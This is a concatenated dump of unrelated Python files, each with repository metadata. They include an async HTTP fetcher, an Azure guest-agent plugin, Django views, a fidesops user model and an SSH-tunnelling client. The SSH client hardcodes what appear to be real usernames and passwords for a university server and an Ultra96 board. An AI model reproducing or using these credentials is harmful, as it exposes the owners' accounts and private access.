request.callback(ERROR.MAX_QUEUE_SIZE, '', request)
except Exception as e:
print '[ERROR]', e
return
currentRequests = self.__currentRequests.get(request.signature(), None)
if currentRequests is not None:
LOG_DEBUG_DEV('request already in flight')
currentRequests.append(request)
return
LOG_DEBUG_DEV('added request to queue')
self.__requestQueue.put(request)
self.__currentRequests[request.signature()] = [int(time.time()), request]
os.write(self.pipeToThread[1], '\n')
# ------------------------------------------------------------------------------------
def onTimer(self, timerID, userData):
self.__checkTimeouts()
# ------------------------------------------------------------------------------------
def processCallbacks(self, fd = None):
LOG_DEBUG_DEV('process callbacks')
pipeIn = self.pipeToMain[0]
os.read(pipeIn, 1)
while not self.__responseQueue.empty():
status, data, request = self.__responseQueue.get()
LOG_DEBUG_DEV(status)
currentRequests = self.__currentRequests.pop(request.signature(), None)
if currentRequests is None:
currentRequests = [request]
else:
currentRequests = currentRequests[1:]
for req in currentRequests:
try:
req.callback(status, data, req)
except Exception as e:
print '[ERROR] callback error:', e
# Remove requests that lives too long
# ------------------------------------------------------------------------------------
def __checkTimeouts(self):
for k in self.__currentRequests.keys():
ts = self.__currentRequests.get(k, (0, 0))[0]
if ts is not None and ts + SETTINGS.REQUEST_PROCESSING_TIMEOUT < time.time():
del self.__currentRequests[k]
# ------------------------------------------------------------------------------------
def __mainThread(self):
pipeIn = self.pipeToMain[0]
while True:
os.read(pipeIn, 1)
while not self.__responseQueue.empty():
status, data, request = self.__responseQueue.get()
request.callback(status, data, request)
# ------------------------------------------------------------------------------------
def __workerThread(self):
pipeIn = self.pipeToThread[0]
self.__epoll.register(pipeIn, select.EPOLLIN)
last10SecondsTime = time.time()
while True:
try:
events = self.__epoll.poll(0.2)
for fileno, event in events:
if fileno == pipeIn:
os.read(pipeIn, 1)
while not self.__requestQueue.empty():
request = self.__requestQueue.get()
self.__processRequest(request)
elif fileno in self.__connections:
self.__processIncoming(fileno)
else:
LOG_DEBUG_DEV('event in unknown descr: %d' % fileno)
self.__epoll.unregister(fileno)
self.__connectionManager.removeConnection(fileno)
ctime = time.time()
for fd in self.__connections.keys():
conn = self.__connections[fd]
if (conn.state == 'connecting' and conn.lastResponse + SETTINGS.CONNECTION_TIMEOUT < ctime) or \
(conn.state == 'connected' and conn.lastResponse + SETTINGS.INACTIVE_TIMEOUT < ctime):
if request.attempts <= 1:
self.__publishResponse(ERROR.CONNECTION_FAILED, '', conn.request)
else:
request.attempts -= 1
self.__processRequest(request)
self.__epoll.unregister(fd)
del self.__connections[fd]
self.__connectionsNumPerHost[conn.host] -= 1
if time.time() > last10SecondsTime + 10.0:
last10SecondsTime = time.time()
self.__connectionManager.removeOldConnections(self.__epoll)
self.__connectionsNumPerHost = defaultdict(int)
for conn in self.__connections:
self.__connectionsNumPerHost[conn.host] += 1
except Exception as e:
print '[ERROR]', e
# ------------------------------------------------------------------------------------
def __publishResponse(self, status, data, request):
LOG_DEBUG_DEV('publishing response %d' % status)
self.__responseQueue.put((status, data, request))
os.write(self.pipeToMain[1], '\n')
# ------------------------------------------------------------------------------------
def __processRequest(self, request):
LOG_DEBUG_DEV('process request')
try:
if self.__connectionsNumPerHost[request.host] >= SETTINGS.MAX_CONNECTIONS_PER_HOST and \
self.__connectionManager.getWaitingConnectionsNum(request.host) == 0:
self.__publishResponse(ERROR.MAX_HOST_CONNECTIONS, '', request)
return
conn = self.__connectionManager.getConnection(request.host, self.__epoll)
except (socket.gaierror, socket.timeout, socket.error):
if request.attempts <= 1:
self.__publishResponse(ERROR.CONNECTION_FAILED, '', request)
else:
request.attempts -= 1
self.__processRequest(request)
return
fno = conn.fileno()
self.__connections[fno] = conn
self.__connectionsNumPerHost[conn.host] += 1
conn.sendRequest(request)
# ------------------------------------------------------------------------------------
def __processIncoming(self, fileno):
LOG_DEBUG_DEV('process incoming')
conn = self.__connections[fileno]
try:
if conn.state == 'connecting':
self.__epoll.unregister(conn.sock.fileno())
self.__epoll.register(conn.sock.fileno(), select.EPOLLIN)
conn.onConnected()
return
res = conn.processResponse()
except (httplib.IncompleteRead, socket.error):
return
except httplib.BadStatusLine:
self.__epoll.unregister(fileno)
del self.__connections[fileno]
self.__connectionsNumPerHost[conn.host] -= 1
if conn.request.attempts <= 1:
self.__publishResponse(ERROR.CONNECTION_DROPED, '', conn.request)
else:
conn.request.attempts -= 1
self.__processRequest(conn.request)
return
status, data, callback = res
self.__publishResponse(status, data, callback)
self.__connectionManager.returnConnection(conn)
del self.__connections[fileno]
self.__connectionsNumPerHost[conn.host] -= 1
# ------------------------------------------------------------------------------------
def getRequestQueueSize(self):
return self.__requestQueue.qsize()
# ------------------------------------------------------------------------------------
def getResponseQueueSize(self):
return self.__responseQueue.qsize()
# ------------------------------------------------------------------------------------
def getConnectionsNumber(self):
return len(self.__connections)
# ------------------------------------------------------------------------------------
def printStatus(self):
print '\n === AsyncFetcher status ==='
print 'connections:', len(self.__connections)
print 'requests-queue:', self.__requestQueue.qsize()
print 'response-queue:', self.__responseQueue.qsize()
self.__connectionManager.printStatus()
print ''
def getStatusDict(self):
status = {
'requests_queue': self.__requestQueue.qsize(),
'response_queue': self.__responseQueue.qsize(),
'connections': len(self.__connections),
}
for k, v in self.__connectionsNumPerHost.iteritems():
status['host_connections.%s' % k] = v
status.update(self.__connectionManager.getStatusDict())
return status
# Usage sample
# ====================================================================================
# ------------------------------------------------------------------------------------
def sampleCallback(status, data, request):
print 'fetched:', status, len(data)
print data
# ------------------------------------------------------------------------------------
if __name__ == '__main__':
fetcher = AsyncFetcher()
while True:
fetcher.fetch(HttpRequest('google.com:80', 'GET', '/', None, sampleCallback))
time.sleep(4.0) | 34.452242 | 103 | 0.552337 |
4a211ea7a6f364c1669daed65f2eab11c72e8360 | 2,037 | py | Python | unported scripts/learn_duration.py | KirovskiXVI/dicom-sr-qi | 810f367d0845f4f47c3ee914502cf973b4f9b336 | [
"BSD-2-Clause"
] | null | null | null | unported scripts/learn_duration.py | KirovskiXVI/dicom-sr-qi | 810f367d0845f4f47c3ee914502cf973b4f9b336 | [
"BSD-2-Clause"
] | null | null | null | unported scripts/learn_duration.py | KirovskiXVI/dicom-sr-qi | 810f367d0845f4f47c3ee914502cf973b4f9b336 | [
"BSD-2-Clause"
] | null | null | null | import my_utils
import numpy as np
def least_squares(t_procs, v_procs):
lookup = {}#maps a CPT code on to an int
for proc in t_procs:
for cpt in proc.get_cpts():
lookup[cpt] = None
for i,cpt in enumerate(sorted(lookup.keys())):
lookup[cpt] = i
#build the arrays for np.linalg.lstsq
b = np.zeros(len(t_procs))
a = np.zeros([len(t_procs),len(lookup)])
for i,proc in enumerate(t_procs):
for cpt in proc.get_cpts():
a[i][lookup[cpt]]=1
b[i] = my_utils.total_seconds(proc.get_duration())
soln, residues, rank, s = np.linalg.lstsq(a,b)
for i,cpt in enumerate(sorted(lookup.keys())):
print str(cpt) +',' + str(soln[i])
error_list = []
skipped_count = 0
for proc in v_procs:
vect = np.zeros(len(lookup))
try:
for cpt in proc.get_cpts():
vect[lookup[cpt]] = 1
except KeyError:
skipped_count = skipped_count +1
continue #cpt code appears in validation but not training set. can't make a prediction
prediction = np.dot(vect, soln)
reality = my_utils.total_seconds(proc.get_duration())
error_list.append(abs(prediction-reality))
error_list.sort()
print error_list
print np.median(error_list)
print "Skipped " + str(skipped_count)
def split_procs(procs, valid_frac = .2):
"""Split the procedures into a
training and validation set based
on start time
"""
procs.sort(key = lambda x: x.get_start_time())
split_ind = int((1-valid_frac) *len(procs))
training = procs[:split_ind]
validation = procs[split_ind:]
return (training, validation)
def main():
procs = my_utils.get_procs('bjh')
has_all_data = lambda x: x.has_syngo() and x.has_events()
procs = [p for p in procs if has_all_data(p)]
t_procs, v_procs = split_procs(procs)
least_squares(t_procs, v_procs)
if __name__ == '__main__':
main()
| 32.854839 | 99 | 0.609229 |
4a211f144c203d49f0c663b66e5f187ab913af9a | 2,518 | py | Python | src/fidesops/models/fidesops_user.py | ethyca/fidesops | 5cfbfda32123593fd7bf2b64586be827d763ea74 | [
"Apache-2.0"
] | 41 | 2021-11-01T23:53:43.000Z | 2022-03-22T23:07:56.000Z | src/fidesops/models/fidesops_user.py | ethyca/fidesops | 5cfbfda32123593fd7bf2b64586be827d763ea74 | [
"Apache-2.0"
] | 235 | 2021-11-01T20:31:55.000Z | 2022-03-31T15:40:58.000Z | src/fidesops/models/fidesops_user.py | ethyca/fidesops | 5cfbfda32123593fd7bf2b64586be827d763ea74 | [
"Apache-2.0"
] | 12 | 2021-11-02T00:44:51.000Z | 2022-03-14T16:23:10.000Z | from datetime import datetime
from typing import Dict, Any, Tuple
from sqlalchemy import Column, String, DateTime
from sqlalchemy.orm import Session, relationship
from fidesops.core.config import config
from fidesops.db.base_class import Base
from fidesops.util.cryptographic_util import generate_salt, hash_with_salt
class FidesopsUser(Base):
"""The DB ORM model for FidesopsUser"""
username = Column(String, unique=True, index=True)
hashed_password = Column(String, nullable=False)
salt = Column(String, nullable=False)
last_login_at = Column(DateTime(timezone=True), nullable=True)
password_reset_at = Column(DateTime(timezone=True), nullable=True)
client = relationship(
"ClientDetail", backref="user", cascade="all, delete", uselist=False
)
@classmethod
def hash_password(cls, password: str) -> Tuple[str, str]:
"""Utility function to hash a user's password with a generated salt"""
salt = generate_salt()
hashed_password = hash_with_salt(
password.encode(config.security.ENCODING),
salt.encode(config.security.ENCODING),
)
return hashed_password, salt
@classmethod
def create(cls, db: Session, data: Dict[str, Any]) -> "FidesopsUser":
"""Create a FidesopsUser by hashing the password with a generated salt
and storing the hashed password and the salt"""
hashed_password, salt = FidesopsUser.hash_password(data["password"])
user = super().create(
db,
data={
"salt": salt,
"hashed_password": hashed_password,
"username": data["username"],
},
)
return user
def credentials_valid(self, password: str) -> bool:
"""Verifies that the provided password is correct"""
provided_password_hash = hash_with_salt(
password.encode(config.security.ENCODING),
self.salt.encode(config.security.ENCODING),
)
return provided_password_hash == self.hashed_password
def update_password(self, db: Session, new_password: str) -> None:
"""Updates the user's password to the specified value.
No validations are performed on the old/existing password within this function."""
hashed_password, salt = FidesopsUser.hash_password(new_password)
self.hashed_password = hashed_password
self.salt = salt
self.password_reset_at = datetime.utcnow()
self.save(db)
| 35.971429 | 90 | 0.668785 |
4a211fa3cc11b7897136647d2975b494f191408c | 192 | py | Python | tones.py | sdickreuter/ToneGen | 69c554c7207563a69479202349061e1f8ef4f328 | [
"MIT"
] | 1 | 2020-09-18T20:27:50.000Z | 2020-09-18T20:27:50.000Z | tones.py | sdickreuter/ToneGen | 69c554c7207563a69479202349061e1f8ef4f328 | [
"MIT"
] | null | null | null | tones.py | sdickreuter/ToneGen | 69c554c7207563a69479202349061e1f8ef4f328 | [
"MIT"
] | null | null | null | # Frequencies of the musical notes in Hz
names = ['B','C','Db','D','Eb','E','F','Gb','G','Ab','A','Bb']
freqs = [7.72, 8.18, 8.66, 9.18, 9.72, 10.30, 10.91, 11.56, 12.25, 12.98, 13.75, 14.57]
| 48 | 87 | 0.53125 |
4a21201a5958e38b10160616296ac0292989a812 | 2,678 | py | Python | external_comms/laptop_1/client_L1.py | ShawnTanzc/CG4002-Capstone-B15 | dd4edfb2a9cc2b876f63c3599f63554dcfc1fb89 | [
"BSD-3-Clause"
] | null | null | null | external_comms/laptop_1/client_L1.py | ShawnTanzc/CG4002-Capstone-B15 | dd4edfb2a9cc2b876f63c3599f63554dcfc1fb89 | [
"BSD-3-Clause"
] | null | null | null | external_comms/laptop_1/client_L1.py | ShawnTanzc/CG4002-Capstone-B15 | dd4edfb2a9cc2b876f63c3599f63554dcfc1fb89 | [
"BSD-3-Clause"
] | null | null | null | import paramiko
from paramiko import SSHClient, AutoAddPolicy
def sshCommand(hostname, port, username, password, command):
sshClient = paramiko.SSHClient()
sshClient.set_missing_host_key_policy(paramiko.AutoAddPolicy())
sshClient.load_system_host_keys()
sshClient.connect(hostname, port, username, password)
stdin, stdout, stderr = sshClient.exec_command(command)
print(stdout.read())
# if __name__ == '__main__':
# sshCommand('sunfire.comp.nus.edu.sg', 22, 'shawntan', 'stzc@S9817869D', 'ls')
# import socket
#
# clientsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# clientsocket.connect(('localhost', 15432))
# clientsocket.send('hello')
# import paramiko
# import sshtunnel
#
# from sshtunnel import SSHTunnelForwarder
#
# server = SSHTunnelForwarder(
# 'sunfire.comp.nus.edu.sg',
# ssh_username="USERNAME",
# ssh_password="PASSWORD",
# remote_bind_address=('127.0.0.1', 8080)
# )
#
# server.start()
#
# print(server.local_bind_port) # show assigned local port
# # work with `SECRET SERVICE` through `server.local_bind_port`.
# server.stop()
import paramiko
import sshtunnel
from sshtunnel import open_tunnel
from time import sleep
import socket
def open_ssh_tunneling_to_ultra96():
ssh_tunnel = open_tunnel(
('sunfire.comp.nus.edu.sg', 22),
ssh_username="shawntan",
ssh_password="stzc@S9817869D",
remote_bind_address=('137.132.86.238', 22),
block_on_close=False)
ssh_tunnel.start()
# print(ssh_tunnel.local_bind_port)
print("Connection to ssh tunnel: OK...")
ultra96_tunnel = open_tunnel(
#('127.0.0.1',ssh_tunnel.local_bind_port),
ssh_address_or_host=('localhost', ssh_tunnel.local_bind_port),
remote_bind_address=('127.0.0.1', 15435),
ssh_username='xilinx',
ssh_password='apricot816',
local_bind_address=('127.0.0.1', 15435),
block_on_close=False
)
ultra96_tunnel.start()
print(ultra96_tunnel.local_bind_port)
print("Connection to ultra 96: OK...")
# sshCommand('localhost', ultra96_tunnel.local_bind_port, 'xilinx', 'apricot816', 'ls')
connect_socket()
def connect_socket():
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as clientsocket:
clientsocket.connect(('localhost', 15435))
print('Connection to server: OK...')
clientsocket.send(b'Hello Nice to Meet you')
data = clientsocket.recv(1024)
print(f'Received {data}')
except ConnectionRefusedError:
print("Unable to connect")
if __name__ == '__main__':
open_ssh_tunneling_to_ultra96()
# connect_socket() | 31.139535 | 91 | 0.690441 |
4a21208af1972fc396bef449f79bd0a04983a809 | 11,345 | py | Python | cloudbaseinit/plugins/windows/azureguestagent.py | andia10240/cloudbase-init | 3c290194c139990f2a0e5747aa2f6c9554d26659 | [
"Apache-2.0"
] | 160 | 2015-01-09T14:45:59.000Z | 2022-03-15T09:15:12.000Z | cloudbaseinit/plugins/windows/azureguestagent.py | andia10240/cloudbase-init | 3c290194c139990f2a0e5747aa2f6c9554d26659 | [
"Apache-2.0"
] | 95 | 2015-01-25T15:22:05.000Z | 2022-03-16T10:40:27.000Z | cloudbaseinit/plugins/windows/azureguestagent.py | andia10240/cloudbase-init | 3c290194c139990f2a0e5747aa2f6c9554d26659 | [
"Apache-2.0"
] | 86 | 2015-01-19T17:19:35.000Z | 2022-03-24T09:21:55.000Z | # Copyright (c) 2017 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import os
import shutil
import zipfile
from oslo_log import log as oslo_logging
from six.moves import winreg
from cloudbaseinit import conf as cloudbaseinit_conf
from cloudbaseinit import exception
from cloudbaseinit.osutils import factory as osutils_factory
from cloudbaseinit.plugins.common import base
CONF = cloudbaseinit_conf.CONF
LOG = oslo_logging.getLogger(__name__)
SERVICE_NAME_RDAGENT = "RdAgent"
SERVICE_NAME_WAGUESTAGENT = "WindowsAzureGuestAgent"
SERVICE_NAME_WA_TELEMETRY = "WindowsAzureTelemetryService"
RDAGENT_FILENAME = "WaAppAgent.exe"
GUEST_AGENT_FILENAME = "Microsoft.Azure.Agent.Windows.exe"
NANO_VMAGENT_FILENAME = "WaSvc.exe"
GUEST_AGENT_EVENTNAME = "Global\AzureAgentStopRequest"
LOGMAN_TRACE_NOT_RUNNING = 0x80300104
LOGMAN_TRACE_NOT_FOUND = 0x80300002
GUEST_AGENT_ROOT_PATH = "WindowsAzure"
PACKAGES_ROOT_PATH = "Packages"
GUEST_AGENT_SOURCE_PATH = '$$\\OEM\GuestAgent'
VM_AGENT_PACKAGE = "VmAgent_Nano.zip"
class AzureGuestAgentPlugin(base.BasePlugin):
@staticmethod
def _check_delete_service(osutils, service_name):
if osutils.check_service_exists(service_name):
svc_status = osutils.get_service_status(service_name)
if svc_status != osutils.SERVICE_STATUS_STOPPED:
osutils.stop_service(service_name, wait=True)
osutils.delete_service(service_name)
@staticmethod
def _remove_agent_services(osutils):
LOG.info("Stopping and removing any existing Azure guest agent "
"services")
for service_name in [
SERVICE_NAME_RDAGENT, SERVICE_NAME_WAGUESTAGENT,
SERVICE_NAME_WA_TELEMETRY]:
AzureGuestAgentPlugin._check_delete_service(
osutils, service_name)
@staticmethod
def _remove_azure_dirs():
for path in [GUEST_AGENT_ROOT_PATH, PACKAGES_ROOT_PATH]:
full_path = os.path.join(os.getenv("SystemDrive"), "\\", path)
if os.path.exists(full_path):
LOG.info("Removing folder: %s", full_path)
try:
shutil.rmtree(full_path)
except Exception as ex:
LOG.error("Failed to remove path: %s", full_path)
LOG.exception(ex)
@staticmethod
def _set_registry_vm_type(vm_type="IAAS"):
with winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows Azure") as key:
winreg.SetValueEx(key, "VMType", 0, winreg.REG_SZ, vm_type)
@staticmethod
def _set_registry_ga_params(install_version, install_timestamp):
with winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\GuestAgent") as key:
install_version_str = "%s.%s.%s.%s" % install_version
winreg.SetValueEx(
key, "Incarnation", 0, winreg.REG_SZ, install_version_str)
install_timestamp_str = install_timestamp.strftime(
'%m/%d/%Y %I:%M:%S %p')
winreg.SetValueEx(
key, "VmProvisionedAt", 0, winreg.REG_SZ,
install_timestamp_str)
@staticmethod
def _configure_vm_agent(osutils, vm_agent_target_path):
vm_agent_zip_path = os.path.join(os.getenv("SystemDrive"), '\\',
"Windows", "NanoGuestAgent",
VM_AGENT_PACKAGE)
vm_agent_log_path = os.path.join(os.getenv("SystemDrive"), '\\',
GUEST_AGENT_ROOT_PATH, "Logs")
if not os.path.exists(vm_agent_log_path):
os.makedirs(vm_agent_log_path)
with zipfile.ZipFile(vm_agent_zip_path) as zf:
zf.extractall(vm_agent_target_path)
vm_agent_service_path = os.path.join(
vm_agent_target_path, NANO_VMAGENT_FILENAME)
vm_agent_service_path = ("{service_path} -name {agent_name} -ownLog "
"{log_path}\\W_svc.log -svcLog {log_path}"
"\\S_svc.log -event {event_name} -- "
"{vm_agent_target_path}\\"
"{guest_agent}".format(
service_path=vm_agent_service_path,
agent_name=SERVICE_NAME_WAGUESTAGENT,
log_path=vm_agent_log_path,
event_name=GUEST_AGENT_EVENTNAME,
vm_agent_target_path=vm_agent_target_path,
guest_agent=GUEST_AGENT_FILENAME))
osutils.create_service(
SERVICE_NAME_WAGUESTAGENT, SERVICE_NAME_WAGUESTAGENT,
vm_agent_service_path, osutils.SERVICE_START_MODE_MANUAL)
@staticmethod
def _configure_rd_agent(osutils, ga_target_path):
rd_agent_service_path = os.path.join(
ga_target_path, RDAGENT_FILENAME)
# TODO(alexpilotti): Add a retry here as the service could have been
# marked for deletion
osutils.create_service(
SERVICE_NAME_RDAGENT, SERVICE_NAME_RDAGENT,
rd_agent_service_path, osutils.SERVICE_START_MODE_MANUAL)
path = os.path.join(ga_target_path, "TransparentInstaller.dll")
ga_version = osutils.get_file_version(path)
ga_install_time = datetime.datetime.now()
AzureGuestAgentPlugin._set_registry_vm_type()
AzureGuestAgentPlugin._set_registry_ga_params(
ga_version, ga_install_time)
@staticmethod
def _stop_event_trace(osutils, name, ets=False):
return AzureGuestAgentPlugin._run_logman(osutils, "stop", name, ets)
@staticmethod
def _delete_event_trace(osutils, name):
return AzureGuestAgentPlugin._run_logman(osutils, "delete", name)
@staticmethod
def _run_logman(osutils, action, name, ets=False):
args = ["logman.exe"]
if ets:
args += ["-ets"]
args += [action, name]
(out, err, ret_val) = osutils.execute_system32_process(args)
if ret_val not in [
0, LOGMAN_TRACE_NOT_RUNNING, LOGMAN_TRACE_NOT_FOUND]:
LOG.error(
'logman failed.\nExit code: %(ret_val)s\n'
'Output: %(out)s\nError: %(err)s',
{'ret_val': hex(ret_val), 'out': out, 'err': err})
@staticmethod
def _stop_ga_event_traces(osutils):
LOG.info("Stopping Azure guest agent event traces")
AzureGuestAgentPlugin._stop_event_trace(osutils, "GAEvents")
AzureGuestAgentPlugin._stop_event_trace(osutils, "RTEvents")
AzureGuestAgentPlugin._stop_event_trace(
osutils, "WindowsAzure-GuestAgent-Metrics", ets=True)
AzureGuestAgentPlugin._stop_event_trace(
osutils, "WindowsAzure-GuestAgent-Diagnostic", ets=True)
@staticmethod
def _delete_ga_event_traces(osutils):
LOG.info("Deleting Azure guest agent event traces")
AzureGuestAgentPlugin._delete_event_trace(osutils, "GAEvents")
AzureGuestAgentPlugin._delete_event_trace(osutils, "RTEvents")
@staticmethod
def _get_guest_agent_source_path(osutils):
base_paths = osutils.get_logical_drives()
for base_path in base_paths:
path = os.path.join(base_path, GUEST_AGENT_SOURCE_PATH)
if os.path.exists(path):
return path
raise exception.CloudbaseInitException(
"Azure guest agent source folder not found")
def execute(self, service, shared_data):
provisioning_data = service.get_vm_agent_package_provisioning_data()
if not provisioning_data:
LOG.info("Azure guest agent provisioning data not present")
elif not provisioning_data.get("provision"):
LOG.info("Skipping Azure guest agent provisioning as by metadata "
"request")
else:
osutils = osutils_factory.get_os_utils()
self._remove_agent_services(osutils)
# TODO(alexpilotti): Check for processes that might still be
# running
self._remove_azure_dirs()
if not osutils.is_nano_server():
ga_package_name = provisioning_data.get("package_name")
if not ga_package_name:
raise exception.ItemNotFoundException(
"Azure guest agent package_name not found in metadata")
LOG.debug("Azure guest agent package name: %s",
ga_package_name)
ga_path = self._get_guest_agent_source_path(osutils)
ga_zip_path = os.path.join(ga_path, ga_package_name)
if not os.path.exists(ga_zip_path):
raise exception.CloudbaseInitException(
"Azure guest agent package file not found: %s" %
ga_zip_path)
self._stop_ga_event_traces(osutils)
self._delete_ga_event_traces(osutils)
ga_target_path = os.path.join(
os.getenv("SystemDrive"), '\\', GUEST_AGENT_ROOT_PATH,
"Packages")
if os.path.exists(ga_target_path):
shutil.rmtree(ga_target_path)
os.makedirs(ga_target_path)
with zipfile.ZipFile(ga_zip_path) as zf:
zf.extractall(ga_target_path)
self._configure_rd_agent(osutils, ga_target_path)
if not osutils.check_dotnet_is_installed("4"):
LOG.warn("The .Net framework 4.5 or greater is required "
"by the Azure guest agent")
else:
osutils.set_service_start_mode(
SERVICE_NAME_RDAGENT,
osutils.SERVICE_START_MODE_AUTOMATIC)
osutils.start_service(SERVICE_NAME_RDAGENT)
else:
vm_agent_target_path = os.path.join(
os.getenv("SystemDrive"), '\\', GUEST_AGENT_ROOT_PATH,
"Packages", "GuestAgent")
if not os.path.exists(vm_agent_target_path):
os.makedirs(vm_agent_target_path)
self._configure_vm_agent(osutils, vm_agent_target_path)
osutils.set_service_start_mode(
SERVICE_NAME_WAGUESTAGENT,
osutils.SERVICE_START_MODE_AUTOMATIC)
osutils.start_service(SERVICE_NAME_WAGUESTAGENT)
return base.PLUGIN_EXECUTION_DONE, False
def get_os_requirements(self):
return 'win32', (6, 1)
| 42.33209 | 79 | 0.627942 |
4a2121493155d4291ce6c7b3b79288bad52192d5 | 473 | py | Python | communication/CAN/SerialLog/test.py | OceanosTeam/Monaco2019 | d75fdc6f63e6c9e283d205b881d8aa06e1f61bc6 | [
"Apache-2.0"
] | null | null | null | communication/CAN/SerialLog/test.py | OceanosTeam/Monaco2019 | d75fdc6f63e6c9e283d205b881d8aa06e1f61bc6 | [
"Apache-2.0"
] | 1 | 2019-06-17T13:04:26.000Z | 2019-06-24T01:17:44.000Z | communication/CAN/SerialLog/test.py | OceanosTeam/Monaco2019 | d75fdc6f63e6c9e283d205b881d8aa06e1f61bc6 | [
"Apache-2.0"
] | 2 | 2019-06-14T14:14:23.000Z | 2019-06-21T15:58:00.000Z | #!/bin/python3
import time
import serial
from serial import Serial
from datetime import datetime
import struct
import sys
# from collections import namedtuple
import numpy as np
import mysql.connector as sql
from scipy import interpolate
Vdata = np.genfromtxt('oceanos_cell_discharge_capacity_14s.csv', dtype=float, delimiter=',', names=True)
vx = Vdata['voltage']
vy = Vdata['Percentage']
f = interpolate.interp1d(vx, vy)
# print(vx)
energy = f(57.0)
print(energy)
| 18.192308 | 104 | 0.769556 |
4a212238c72f48611b0eaadc8d1c0535b8894f50 | 636 | py | Python | problems/test_0303.py | chrisxue815/leetcode_python | dec3c160d411a5c19dc8e9d96e7843f0e4c36820 | [
"Unlicense"
] | 1 | 2017-06-17T23:47:17.000Z | 2017-06-17T23:47:17.000Z | problems/test_0303.py | chrisxue815/leetcode_python | dec3c160d411a5c19dc8e9d96e7843f0e4c36820 | [
"Unlicense"
] | null | null | null | problems/test_0303.py | chrisxue815/leetcode_python | dec3c160d411a5c19dc8e9d96e7843f0e4c36820 | [
"Unlicense"
] | null | null | null | import unittest
from typing import List
import utils
# O(n) space. DP, prefix.
class NumArray:
# O(n) time. O(1) space.
def __init__(self, nums: List[int]):
self.sums = [0] * len(nums)
sum_ = 0
for i in range(len(nums)):
sum_ += nums[i]
self.sums[i] = sum_
# O(1) time. O(1) space.
def sumRange(self, left: int, right: int) -> int:
return self.sums[right] - (self.sums[left - 1] if left > 0 else 0)
class Test(unittest.TestCase):
def test(self):
utils.test_invocations(self, __file__, NumArray)
if __name__ == '__main__':
unittest.main()
| 20.516129 | 74 | 0.581761 |
4a21224fb1308b28b73344ac8530dedf0a6a29f3 | 703 | py | Python | diversity/generate-comment-embeddings.py | VectorInstitute/projectpensive | 7fa78964ba7bd2d25892c99dd4cedb0d54f8d267 | [
"MIT"
] | 2 | 2021-09-08T01:59:10.000Z | 2021-09-29T02:20:58.000Z | diversity/generate-comment-embeddings.py | VectorInstitute/projectpensive | 7fa78964ba7bd2d25892c99dd4cedb0d54f8d267 | [
"MIT"
] | null | null | null | diversity/generate-comment-embeddings.py | VectorInstitute/projectpensive | 7fa78964ba7bd2d25892c99dd4cedb0d54f8d267 | [
"MIT"
] | 1 | 2021-09-29T02:21:04.000Z | 2021-09-29T02:21:04.000Z | import pandas as pd
import numpy as np
import torch
import time
from sentence_transformers import SentenceTransformer, util
if __name__ == "__main__":
# Open data
data = pd.read_csv('../civility/recommender/train-balanced-sarcasm-processed.csv')
corpus = data['comment'].to_list()
embedder = SentenceTransformer('paraphrase-MiniLM-L6-v2')
start_time = time.time()
# Generate Embeddings
sarcasm_embeddings = embedder.encode(corpus, convert_to_tensor=True)
end_time = time.time()
print("Time for computing embeddings:"+ str(end_time-start_time))
# Save embeddings to pickle file
torch.save(sarcasm_embeddings, 'datasets/sarcasm-embeddings-processed.pt') | 33.47619 | 86 | 0.739687 |
4a2123c02fadbcc2d395264907fc91ae27cf5e68 | 958 | py | Python | twitter_watcher/views.py | azubieta/cmtrends | 31b98e0e6ceed72f58cf831715ec56468c90386a | [
"Apache-2.0"
] | null | null | null | twitter_watcher/views.py | azubieta/cmtrends | 31b98e0e6ceed72f58cf831715ec56468c90386a | [
"Apache-2.0"
] | null | null | null | twitter_watcher/views.py | azubieta/cmtrends | 31b98e0e6ceed72f58cf831715ec56468c90386a | [
"Apache-2.0"
] | null | null | null | from django.template import RequestContext, loader
from django.http import HttpResponse
from django.shortcuts import render, render_to_response
from django.http import HttpResponseRedirect, HttpResponse
from django.http import Http404
import stakeholders
import initiatives
import sys
import json
# Create your views here.
def index(request):
context = {}#'latest_question_list': latest_question_list#}
return render_to_response("index.html", context)
def recent_tweets(request):
tweets = initiatives.discover_tweets(0)
return HttpResponse(json.dumps(tweets))
# if request.is_ajax():
# try:
# tweets = initiatives.discover_tweets()
# return HttpResponse(json.dumps(tweets))
# #stakeholder = int(request.POST['stakeholder'])
# except KeyError:
# return HttpResponse('Error') # incorrect post
# else:
# raise Http404
def list_stakeholders():
output = stakeholdesrs.list_friends()
return HttpResponse(json.dumps(output))
| 22.809524 | 60 | 0.770355 |
4a212440761091540863017c2237b9dfdca5c58e | 4,064 | py | Python | venv/lib/python3.8/site-packages/ipykernel/parentpoller.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | 7 | 2022-01-16T12:28:16.000Z | 2022-03-04T15:31:45.000Z | venv/lib/python3.8/site-packages/ipykernel/parentpoller.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | 8 | 2021-09-22T12:47:32.000Z | 2022-01-14T21:30:38.000Z | venv/lib/python3.8/site-packages/ipykernel/parentpoller.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | 1 | 2022-03-28T09:19:34.000Z | 2022-03-28T09:19:34.000Z | # Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
try:
import ctypes
except ImportError:
ctypes = None
import os
import platform
import signal
import time
from _thread import interrupt_main # Py 3
from threading import Thread
from traitlets.log import get_logger
import warnings
class ParentPollerUnix(Thread):
""" A Unix-specific daemon thread that terminates the program immediately
when the parent process no longer exists.
"""
def __init__(self):
super().__init__()
self.daemon = True
def run(self):
# We cannot use os.waitpid because it works only for child processes.
from errno import EINTR
while True:
try:
if os.getppid() == 1:
get_logger().warning("Parent appears to have exited, shutting down.")
os._exit(1)
